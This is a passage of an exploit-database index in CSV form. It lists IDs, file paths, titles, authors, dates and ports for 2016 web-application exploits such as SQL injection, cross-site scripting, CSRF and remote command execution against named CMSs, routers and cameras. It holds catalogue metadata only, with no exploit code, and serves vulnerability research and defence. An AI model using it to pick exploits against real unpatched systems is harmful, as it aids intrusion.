Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,ios,webapps, -39725,exploits/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 -39726,exploits/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 'sysconf.cgi' Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 -39730,exploits/ruby/webapps/39730.txt,"NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443 -39737,exploits/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",php,webapps,80 -39738,exploits/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080 -39739,exploits/hardware/webapps/39739.py,"RomPager 4.34 (Multiple Router Vendors) - 'Misfortune Cookie' Authentication Bypass",2016-04-27,"Milad Doorbash",hardware,webapps, -39744,exploits/php/webapps/39744.html,"Observium 0.16.7533 - Cross-Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80 -39745,exploits/php/webapps/39745.txt,"Observium 0.16.7533 - Authenticated Arbitrary Command Execution",2016-04-29,"Dolev Farhi",php,webapps,80 -39746,exploits/cgi/webapps/39746.txt,"Merit Lilin IP Cameras - Multiple Vulnerabilities",2016-04-29,Orwelllabs,cgi,webapps,80 -39751,exploits/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",php,webapps,80 -39752,exploits/php/webapps/39752.txt,"WordPress Plugin Ghost 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",php,webapps,80 -39759,exploits/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",php,webapps,80 -39760,exploits/php/webapps/39760.txt,"CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",php,webapps,80 -39761,exploits/php/webapps/39761.txt,"WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",php,webapps,80 -39762,exploits/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",cgi,webapps,80 -39765,exploits/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",cgi,webapps, -39766,exploits/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,php,webapps, -39777,exploits/asp/webapps/39777.txt,"DotNetNuke 07.04.00 - Administration Authentication Bypass",2016-05-06,"Marios Nicolaides",asp,webapps,80 -39780,exploits/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",jsp,webapps,443 -39781,exploits/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,php,webapps,80 -39784,exploits/php/webapps/39784.txt,"ZeewaysCMS - Multiple Vulnerabilities",2016-05-09,"Bikramaditya Guha",php,webapps,80 -39798,exploits/hardware/webapps/39798.txt,"JVC HDRs / Net (Multiple Cameras) - Multiple Vulnerabilities",2016-05-10,Orwelllabs,hardware,webapps,80 -39806,exploits/php/webapps/39806.txt,"WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 -39807,exploits/php/webapps/39807.txt,"WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 -39808,exploits/windows/webapps/39808.txt,"Trend Micro - 'CoreServiceShell.exe' Multiple HTTP s",2016-05-12,"Google Security Research",windows,webapps,37848 -39883,exploits/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 -39813,exploits/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80 -39816,exploits/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps, -39817,exploits/php/webapps/39817.php,"Web Interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps, -39821,exploits/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps, -39822,exploits/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps, -39837,exploits/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps, -39838,exploits/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize / Arbitrary Write File",2016-05-18,agix,php,webapps,80 -39840,exploits/xml/webapps/39840.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection",2016-05-19,ERPScan,xml,webapps, -39841,exploits/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps, -39848,exploits/php/webapps/39848.py,"WordPress Plugin Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80 -39849,exploits/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443 -39850,exploits/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection",2016-05-24,"Mehmet Ince",asp,webapps,80 -39855,exploits/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80 -39856,exploits/php/webapps/39856.txt,"EduSec 4.2.5 - SQL Injection",2016-05-26,"Bikramaditya Guha",php,webapps,80 -39864,exploits/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80 -40059,exploits/php/webapps/40059.txt,"CIMA DocuClass ECM - Multiple Vulnerabilities",2016-07-06,"Karn Ganeshen",php,webapps,80 -39868,exploits/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80 -39870,exploits/php/webapps/39870.html,"Flatpress 1.0.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-05-31,LiquidWorm,php,webapps,80 -39871,exploits/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80 -40464,exploits/cgi/webapps/40464.txt,"Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion",2016-10-05,KoreLogic,cgi,webapps, -39872,exploits/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple Vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80 -39876,exploits/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80 -39965,exploits/php/webapps/39965.txt,"Tiki Wiki CMS Calendar 6.15/9.11 LTS/12.5 LTS/14.2 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80 -39879,exploits/php/webapps/39879.txt,"Joomla! Component SecurityCheck 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80 -39880,exploits/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",jsp,webapps, -39881,exploits/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706/1.5.1/1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80 -40463,exploits/cgi/webapps/40463.txt,"Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution",2016-10-05,KoreLogic,cgi,webapps, -39884,exploits/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",php,webapps,80 -39886,exploits/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps, -39887,exploits/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)",2016-06-06,lastc0de,cgi,webapps,80 -39889,exploits/php/webapps/39889.html,"ArticleSetup 1.00 - Cross-Site Request Forgery (Change Admin Password)",2016-06-06,"Ali Ghanbari",php,webapps,80 -39890,exploits/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80 -39891,exploits/php/webapps/39891.txt,"WordPress Plugin WP Mobile Detector 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80 -39892,exploits/php/webapps/39892.php,"WordPress Theme Creative Multi-Purpose 9.1.3 - Persistent Cross-Site Scripting",2016-06-06,wp0Day.com,php,webapps,80 -39893,exploits/php/webapps/39893.php,"WordPress Plugin WP PRO Advertising System 4.6.18 - SQL Injection",2016-06-06,wp0Day.com,php,webapps,80 -39894,exploits/php/webapps/39894.php,"WordPress Theme Newspaper 6.7.1 - Privilege Escalation",2016-06-06,wp0Day.com,php,webapps,80 -39895,exploits/php/webapps/39895.php,"WordPress Theme Uncode 1.3.1 - Arbitrary File Upload",2016-06-06,wp0Day.com,php,webapps,80 -39896,exploits/php/webapps/39896.txt,"WordPress Plugin Double Opt-In for Download 2.0.9 - SQL Injection",2016-06-06,"Kacper Szurek",php,webapps,80 -39897,exploits/asp/webapps/39897.txt,"Notilus Travel Solution Software 2012 R3 - SQL Injection",2016-06-06,"Alex Haynes",asp,webapps,80 -39898,exploits/php/webapps/39898.txt,"rConfig 3.1.1 - Local File Inclusion",2016-06-06,"Gregory Pickett",php,webapps,80 -39899,exploits/php/webapps/39899.txt,"Nagios XI 5.2.7 - Multiple Vulnerabilities",2016-06-06,Security-Assessment.com,php,webapps,80 -39904,exploits/asp/webapps/39904.txt,"Cisco EPC 3928 - Multiple Vulnerabilities",2016-06-07,"Patryk Bogdan",asp,webapps, -39905,exploits/php/webapps/39905.txt,"Drale DBTableViewer 100123 - Blind SQL Injection",2016-06-08,HaHwul,php,webapps,80 -39909,exploits/xml/webapps/39909.rb,"Dell OpenManage Server Administrator 8.3 - XML External Entity",2016-06-10,hantwister,xml,webapps, -40047,exploits/php/webapps/40047.txt,"Phoenix Exploit Kit - Remote Code Execution",2016-07-01,CrashBandicot,php,webapps,80 -39911,exploits/php/webapps/39911.html,"Mobiketa 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-10,"Murat Yilmazlar",php,webapps,80 -39912,exploits/php/webapps/39912.html,"miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (SQL Execution)",2016-06-10,HaHwul,php,webapps,80 -39913,exploits/php/webapps/39913.txt,"phpMyFAQ 2.9.0 - Persistent Cross-Site Scripting",2016-06-10,"Kacper Szurek",php,webapps,80 -39931,exploits/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",php,webapps,80 -39932,exploits/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",php,webapps,80 -39934,exploits/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 -39935,exploits/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 -39936,exploits/php/webapps/39936.txt,"Joomla! Component com_payplans 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80 -39937,exploits/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution",2016-06-13,"Alexander Gurin",php,webapps,80 -39946,exploits/php/webapps/39946.php,"WordPress Plugin Social Stream 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80 -39948,exploits/php/webapps/39948.txt,"Ultrabenosaurus ChatBoard - Persistent Cross-Site Scripting",2016-06-15,HaHwul,php,webapps,80 -39949,exploits/php/webapps/39949.html,"Ultrabenosaurus ChatBoard - Cross-Site Request Forgery (Send Message)",2016-06-15,HaHwul,php,webapps,80 -39950,exploits/php/webapps/39950.txt,"w2wiki - Multiple Cross-Site Scripting Vulnerabilities",2016-06-15,HaHwul,php,webapps,80 -39951,exploits/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,hardware,webapps,80 -39952,exploits/php/webapps/39952.txt,"Dokeos 2.2.1 - Blind SQL Injection",2016-06-15,Mormoroth,php,webapps,80 -39953,exploits/php/webapps/39953.txt,"Joomla! Component com_enmasse 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80 -39955,exploits/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80 -39956,exploits/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80 -39957,exploits/php/webapps/39957.py,"PHPLive 4.4.8 < 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80 -39962,exploits/hardware/webapps/39962.txt,"ATCOM PBX IP01 / IP08 / IP4 / IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,hardware,webapps,80 -39963,exploits/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",php,webapps,80 -39964,exploits/php/webapps/39964.html,"SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80 -39969,exploits/php/webapps/39969.php,"WordPress Plugin Gravity Forms 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80 -39970,exploits/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Persistent Cross-Site Scripting",2016-06-17,"David Silveiro",php,webapps,80 -39971,exploits/php/webapps/39971.php,"phpATM 1.32 (Windows) - Arbitrary File Upload / Remote Command Execution",2016-06-17,"Paolo Massenio",php,webapps,80 -39972,exploits/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80 -39974,exploits/php/webapps/39974.html,"WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 -39976,exploits/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80 -39977,exploits/php/webapps/39977.txt,"Joomla! Component com_bt_media 1.0 - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80 -39978,exploits/php/webapps/39978.php,"WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80 -39981,exploits/php/webapps/39981.html,"Airia - Cross-Site Request Forgery (Add Content)",2016-06-20,HaHwul,php,webapps,80 -39982,exploits/php/webapps/39982.rb,"Airia - Arbitrary File Upload",2016-06-20,HaHwul,php,webapps,80 -39983,exploits/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80 -39987,exploits/php/webapps/39987.html,"IonizeCMS 1.0.8 - Cross-Site Request Forgery (Add Admin)",2016-06-21,s0nk3y,php,webapps,80 -39988,exploits/php/webapps/39988.html,"Yona CMS - Cross-Site Request Forgery",2016-06-21,s0nk3y,php,webapps,80 -39989,exploits/php/webapps/39989.txt,"Joomla! Component com_publisher - SQL Injection",2016-06-21,s0nk3y,php,webapps,80 -39995,exploits/java/webapps/39995.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - 'ctcprotocol Servlet' XML External Entity",2016-06-21,ERPScan,java,webapps, -39996,exploits/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps, -39997,exploits/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-06-21,"David Silveiro",ruby,webapps,80 -39998,exploits/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80 -40111,exploits/php/webapps/40111.txt,"Joomla! Component Guru Pro - SQL Injection",2016-07-14,s0nk3y,php,webapps,80 -40006,exploits/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80 -40009,exploits/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80 -40010,exploits/php/webapps/40010.html,"XuezhuLi FileSharing - Cross-Site Request Forgery (Add User)",2016-06-23,HaHwul,php,webapps,80 -40011,exploits/php/webapps/40011.txt,"FinderView - Multiple Vulnerabilities",2016-06-23,HaHwul,php,webapps,80 -40012,exploits/php/webapps/40012.txt,"WordPress Plugin Ultimate Product Catalog 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80 -40013,exploits/php/webapps/40013.txt,"OPAC KpwinSQL - SQL Injection",2016-06-27,bRpsd,php,webapps,80 -40015,exploits/php/webapps/40015.txt,"CodoForum 3.4 - Persistent Cross-Site Scripting",2016-06-27,"Ahmed Sherif",php,webapps,80 -40016,exploits/hardware/webapps/40016.txt,"Option CloudGate CG0192-11897 - Multiple Vulnerabilities",2016-06-27,LiquidWorm,hardware,webapps,80 -40332,exploits/hardware/webapps/40332.py,"Belkin F9K1122v1 1.00.30 - Buffer Overflow (via Cross-Site Request Forgery)",2016-09-04,b1ack0wl,hardware,webapps, -40019,exploits/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80 -40021,exploits/php/webapps/40021.php,"My Little Forum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80 -40022,exploits/php/webapps/40022.txt,"iBilling 3.7.0 - Persistent Cross-Site Scripting / Reflected Cross-Site Scripting",2016-06-27,"Bikramaditya Guha",php,webapps,80 -40024,exploits/php/webapps/40024.txt,"BigTree CMS 4.2.11 - SQL Injection",2016-06-27,"Mehmet Ince",php,webapps,80 -40027,exploits/php/webapps/40027.txt,"SugarCRM 6.5.18 - PHP Code Injection",2016-06-27,"Egidio Romano",php,webapps,80 -40028,exploits/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,php,webapps,443 -40030,exploits/json/webapps/40030.py,"Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection",2016-06-28,"Matt Bush",json,webapps,80 -40041,exploits/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445 -40042,exploits/php/webapps/40042.php,"WordPress Plugin Ultimate Membership Pro 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80 -40044,exploits/cgi/webapps/40044.html,"Ubiquiti Administration Portal - Remote Command Execution (via Cross-Site Request Forgery)",2016-06-29,KoreLogic,cgi,webapps,443 -40045,exploits/php/webapps/40045.txt,"Concrete5 CMS 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80 -40092,exploits/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80 -40093,exploits/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80 -40050,exploits/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution / Cross-Site Request Forgery",2016-07-04,LiquidWorm,jsp,webapps,30303 -40051,exploits/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80 -40055,exploits/php/webapps/40055.py,"WordPress Plugin Real3D FlipBook - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80 -40057,exploits/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80 -40058,exploits/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80 -40060,exploits/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",jsp,webapps,80 -40062,exploits/php/webapps/40062.txt,"Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities",2016-07-06,"Bikramaditya Guha",php,webapps,80 -40063,exploits/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic_ Grega Preseren",cgi,webapps,80 -40065,exploits/jsp/webapps/40065.txt,"OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80 -40068,exploits/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80 -40070,exploits/php/webapps/40070.txt,"WordPress Plugin Lazy Content Slider 3.4 - Cross-Site Request Forgery (Add Catetory)",2016-07-08,"Persian Hack Team",php,webapps,80 -40076,exploits/php/webapps/40076.php,"PHP Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",php,webapps,80 -40077,exploits/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - Unauthenticated XML External Entity Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052 -40078,exploits/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80 -40106,exploits/windows/webapps/40106.txt,"GSX Analyzer 10.12/11 - 'main.swf' Hard-Coded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps, -40109,exploits/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps, -40112,exploits/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 -40114,exploits/php/webapps/40114.py,"vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API Authenticated Persistent Cross-Site Scripting",2014-10-12,tintinweb,php,webapps, -40115,exploits/php/webapps/40115.py,"vBulletin 4.x - breadcrumbs via xmlrpc API Authenticated SQL Injection",2014-10-12,tintinweb,php,webapps, -40193,exploits/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",php,webapps,80 -40171,exploits/linux/webapps/40171.txt,"AXIS (Multiple Products) - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80 -40126,exploits/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 -40127,exploits/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 -40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,python,webapps,80 -40133,exploits/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,multiple,webapps,8088 -40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,multiple,webapps,8088 -40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,multiple,webapps,8088 -40137,exploits/php/webapps/40137.html,"WordPress Plugin Video Player 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80 -40140,exploits/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80 -40149,exploits/php/webapps/40149.rb,"Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)",2016-07-25,"Mehmet Ince",php,webapps,80 -40150,exploits/php/webapps/40150.txt,"CodoForum 3.2.1 - SQL Injection",2016-07-25,"Yakir Wizman",php,webapps,80 -40153,exploits/php/webapps/40153.txt,"GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload",2016-07-25,kmkz,php,webapps,80 -40154,exploits/php/webapps/40154.txt,"PHP gettext 1.0.12 - 'gettext.php' Unauthenticated Code Execution",2016-07-25,kmkz,php,webapps, -40156,exploits/cgi/webapps/40156.py,"Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80 -40157,exploits/cgi/webapps/40157.py,"Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80 -40158,exploits/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80 -40159,exploits/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80 -40160,exploits/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps, -40161,exploits/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443 -40163,exploits/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80 -40165,exploits/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 -40166,exploits/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80 -40174,exploits/php/webapps/40174.txt,"WordPress Plugin Ultimate Product Catalog 3.9.8 - do_shortcode via ajax Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80 -40180,exploits/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7/3.8 SP1 (3.81)/3.8 SP2 (3.82) - 'hotfix_upload.cgi' Filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443 -40185,exploits/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Authenticated Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80 -40189,exploits/php/webapps/40189.txt,"WordPress Plugin Booking Calendar 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",php,webapps,80 -40190,exploits/php/webapps/40190.txt,"WordPress Plugin WP Live Chat Support 6.2.03 - Persistent Cross-Site Scripting",2016-08-01,"Dennis Kerdijk & Erwin Kievith",php,webapps,80 -40191,exploits/php/webapps/40191.txt,"WordPress Plugin ALO EasyMail NewsLetter 2.9.2 - Cross-Site Request Forgery (Add/Import Arbitrary Subscribers)",2016-08-01,"Yorick Koster",php,webapps,80 -40202,exploits/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80 -40204,exploits/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80 -40205,exploits/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80 -40206,exploits/php/webapps/40206.txt,"WordPress Plugin Count Per Day 3.5.4 - Persistent Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80 -40207,exploits/hardware/webapps/40207.txt,"NASdeluxe NDL-2400r 2.01.09 - OS Command Injection",2016-08-05,"SySS GmbH",hardware,webapps,80 -40209,exploits/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Code Execution",2016-08-06,LiquidWorm,php,webapps,80 -40210,exploits/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin)",2016-08-06,LiquidWorm,php,webapps,80 -40211,exploits/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80 -40212,exploits/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injections",2016-08-06,LiquidWorm,php,webapps,80 -40213,exploits/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)",2016-08-06,LiquidWorm,cgi,webapps,80 